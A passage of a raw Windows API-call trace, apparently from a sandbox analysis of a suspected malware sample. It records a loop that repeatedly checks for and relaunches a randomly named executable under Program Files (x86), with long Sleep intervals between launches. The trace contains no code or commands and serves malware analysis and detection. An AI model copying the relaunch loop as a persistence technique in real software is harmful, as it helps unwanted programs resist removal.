| out: lpProcessInformation=0x122bfe80*(hProcess=0x20a4, hThread=0x150c, dwProcessId=0x928, dwThreadId=0xb4c), hNewToken=0x0) returned 1 [0192.022] Sleep (dwMilliseconds=0x1388) [0192.024] Sleep (dwMilliseconds=0x1388) [0192.026] Sleep (dwMilliseconds=0x1388) [0192.036] Sleep (dwMilliseconds=0x1388) [0192.037] Sleep (dwMilliseconds=0x1388) [0192.039] Sleep (dwMilliseconds=0x1388) [0192.040] Sleep (dwMilliseconds=0x1388) [0192.042] Sleep (dwMilliseconds=0x1388) [0192.043] Sleep (dwMilliseconds=0x1388) [0192.045] Sleep (dwMilliseconds=0x1388) [0192.046] Sleep (dwMilliseconds=0x1388) [0192.048] Sleep (dwMilliseconds=0x1388) [0192.050] Sleep (dwMilliseconds=0x1388) [0192.053] Sleep (dwMilliseconds=0x1388) [0192.055] Sleep (dwMilliseconds=0x1388) [0192.056] Sleep (dwMilliseconds=0x1388) [0192.058] Sleep (dwMilliseconds=0x1388) [0192.060] Sleep (dwMilliseconds=0x1388) [0192.062] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.062] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20b4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.062] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.062] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0192.062] NtQueryInformationFile (in: FileHandle=0x20b4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.062] NtClose (Handle=0x20b4) returned 0x0 [0192.062] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.062] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20b4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.062] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.062] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65600) returned 1 [0192.062] NtClose (Handle=0x20b4) returned 0x0 [0192.065] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x198c, hThread=0x20b4, dwProcessId=0x87c, dwThreadId=0x680), hNewToken=0x0) returned 1 [0192.081] Sleep (dwMilliseconds=0x1388) [0192.085] Sleep (dwMilliseconds=0x1388) [0192.087] Sleep (dwMilliseconds=0x1388) [0192.105] Sleep (dwMilliseconds=0x1388) [0192.107] Sleep (dwMilliseconds=0x1388) [0192.110] Sleep (dwMilliseconds=0x1388) [0192.111] Sleep (dwMilliseconds=0x1388) [0192.113] Sleep (dwMilliseconds=0x1388) [0192.118] Sleep (dwMilliseconds=0x1388) [0192.119] Sleep (dwMilliseconds=0x1388) [0192.121] Sleep (dwMilliseconds=0x1388) [0192.123] Sleep (dwMilliseconds=0x1388) [0192.125] Sleep (dwMilliseconds=0x1388) [0192.127] Sleep (dwMilliseconds=0x1388) [0192.128] Sleep (dwMilliseconds=0x1388) [0192.129] Sleep (dwMilliseconds=0x1388) [0192.134] Sleep (dwMilliseconds=0x1388) [0192.136] Sleep (dwMilliseconds=0x1388) [0192.137] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.137] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1c64, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.138] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.138] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0192.138] NtQueryInformationFile (in: FileHandle=0x1c64, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.138] NtClose (Handle=0x1c64) returned 0x0 [0192.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.138] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1c64, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.138] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.138] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0192.138] NtClose (Handle=0x1c64) returned 0x0 [0192.142] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20b0, hThread=0x1c64, dwProcessId=0x8fc, dwThreadId=0x874), hNewToken=0x0) returned 1 [0192.191] Sleep (dwMilliseconds=0x1388) [0192.192] Sleep (dwMilliseconds=0x1388) [0192.194] Sleep (dwMilliseconds=0x1388) [0192.195] Sleep (dwMilliseconds=0x1388) [0192.197] Sleep (dwMilliseconds=0x1388) [0192.207] Sleep (dwMilliseconds=0x1388) [0192.209] Sleep (dwMilliseconds=0x1388) [0192.210] Sleep (dwMilliseconds=0x1388) [0192.212] Sleep (dwMilliseconds=0x1388) [0192.216] Sleep (dwMilliseconds=0x1388) [0192.218] Sleep (dwMilliseconds=0x1388) [0192.221] Sleep (dwMilliseconds=0x1388) [0192.222] Sleep (dwMilliseconds=0x1388) [0192.224] Sleep (dwMilliseconds=0x1388) [0192.225] Sleep (dwMilliseconds=0x1388) [0192.227] Sleep (dwMilliseconds=0x1388) [0192.228] Sleep (dwMilliseconds=0x1388) [0192.232] Sleep (dwMilliseconds=0x1388) [0192.234] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.234] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20a0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.234] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.234] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64900) returned 1 [0192.234] NtQueryInformationFile (in: FileHandle=0x20a0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.234] NtClose (Handle=0x20a0) returned 0x0 [0192.234] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.234] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20a0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.235] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.235] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0192.235] NtClose (Handle=0x20a0) returned 0x0 [0192.237] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0xddc, hThread=0x20a0, dwProcessId=0x718, dwThreadId=0x47c), hNewToken=0x0) returned 1 [0192.255] Sleep (dwMilliseconds=0x1388) [0192.257] Sleep (dwMilliseconds=0x1388) [0192.258] Sleep (dwMilliseconds=0x1388) [0192.260] Sleep (dwMilliseconds=0x1388) [0192.267] Sleep (dwMilliseconds=0x1388) [0192.269] Sleep (dwMilliseconds=0x1388) [0192.270] Sleep (dwMilliseconds=0x1388) [0192.271] Sleep (dwMilliseconds=0x1388) [0192.273] Sleep (dwMilliseconds=0x1388) [0192.274] Sleep (dwMilliseconds=0x1388) [0192.276] Sleep (dwMilliseconds=0x1388) [0192.280] Sleep (dwMilliseconds=0x1388) [0192.281] Sleep (dwMilliseconds=0x1388) [0192.283] Sleep (dwMilliseconds=0x1388) [0192.284] Sleep (dwMilliseconds=0x1388) [0192.286] Sleep (dwMilliseconds=0x1388) [0192.287] Sleep (dwMilliseconds=0x1388) [0192.290] Sleep (dwMilliseconds=0x1388) [0192.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.296] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1518, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.296] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65a80) returned 1 [0192.296] NtQueryInformationFile (in: FileHandle=0x1518, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.296] NtClose (Handle=0x1518) returned 0x0 [0192.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.297] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1518, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.297] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.297] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0192.297] NtClose (Handle=0x1518) returned 0x0 [0192.300] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1514, hThread=0x1518, dwProcessId=0x948, dwThreadId=0x93c), hNewToken=0x0) returned 1 [0192.318] Sleep (dwMilliseconds=0x1388) [0192.319] Sleep (dwMilliseconds=0x1388) [0192.320] Sleep (dwMilliseconds=0x1388) [0192.322] Sleep (dwMilliseconds=0x1388) [0192.323] Sleep (dwMilliseconds=0x1388) [0192.325] Sleep (dwMilliseconds=0x1388) [0192.326] Sleep (dwMilliseconds=0x1388) [0192.331] Sleep (dwMilliseconds=0x1388) [0192.332] Sleep (dwMilliseconds=0x1388) [0192.334] Sleep (dwMilliseconds=0x1388) [0192.335] Sleep (dwMilliseconds=0x1388) [0192.337] Sleep (dwMilliseconds=0x1388) [0192.338] Sleep (dwMilliseconds=0x1388) [0192.340] Sleep (dwMilliseconds=0x1388) [0192.342] Sleep (dwMilliseconds=0x1388) [0192.343] Sleep (dwMilliseconds=0x1388) [0192.347] Sleep (dwMilliseconds=0x1388) [0192.348] Sleep (dwMilliseconds=0x1388) [0192.350] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.350] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1998, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.350] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.350] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0192.350] NtQueryInformationFile (in: FileHandle=0x1998, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.350] NtClose (Handle=0x1998) returned 0x0 [0192.351] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.351] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1998, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.351] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.351] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65f80) returned 1 [0192.351] NtClose (Handle=0x1998) returned 0x0 [0192.354] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x19d4, hThread=0x1998, dwProcessId=0x930, dwThreadId=0x8f4), hNewToken=0x0) returned 1 [0192.370] Sleep (dwMilliseconds=0x1388) [0192.371] Sleep (dwMilliseconds=0x1388) [0192.373] Sleep (dwMilliseconds=0x1388) [0192.374] Sleep (dwMilliseconds=0x1388) [0192.377] Sleep (dwMilliseconds=0x1388) [0192.378] Sleep (dwMilliseconds=0x1388) [0192.380] Sleep (dwMilliseconds=0x1388) [0192.381] Sleep (dwMilliseconds=0x1388) [0192.383] Sleep (dwMilliseconds=0x1388) [0192.384] Sleep (dwMilliseconds=0x1388) [0192.386] Sleep (dwMilliseconds=0x1388) [0192.387] Sleep (dwMilliseconds=0x1388) [0192.389] Sleep (dwMilliseconds=0x1388) [0192.391] Sleep (dwMilliseconds=0x1388) [0192.396] Sleep (dwMilliseconds=0x1388) [0192.398] Sleep (dwMilliseconds=0x1388) [0192.399] Sleep (dwMilliseconds=0x1388) [0192.401] Sleep (dwMilliseconds=0x1388) [0192.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.402] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xb8c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.403] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.403] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0192.403] NtQueryInformationFile (in: FileHandle=0xb8c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.403] NtClose (Handle=0xb8c) returned 0x0 [0192.403] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.403] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xb8c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.403] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.403] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0192.403] NtClose (Handle=0xb8c) returned 0x0 [0192.406] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x12cc, hThread=0xb8c, dwProcessId=0x884, dwThreadId=0xa50), hNewToken=0x0) returned 1 [0192.422] Sleep (dwMilliseconds=0x1388) [0192.427] Sleep (dwMilliseconds=0x1388) [0192.429] Sleep (dwMilliseconds=0x1388) [0192.430] Sleep (dwMilliseconds=0x1388) [0192.432] Sleep (dwMilliseconds=0x1388) [0192.433] Sleep (dwMilliseconds=0x1388) [0192.435] Sleep (dwMilliseconds=0x1388) [0192.436] Sleep (dwMilliseconds=0x1388) [0192.438] Sleep (dwMilliseconds=0x1388) [0192.439] Sleep (dwMilliseconds=0x1388) [0192.469] Sleep (dwMilliseconds=0x1388) [0192.487] Sleep (dwMilliseconds=0x1388) [0192.493] Sleep (dwMilliseconds=0x1388) [0192.498] Sleep (dwMilliseconds=0x1388) [0192.500] Sleep (dwMilliseconds=0x1388) [0192.507] Sleep (dwMilliseconds=0x1388) [0192.509] Sleep 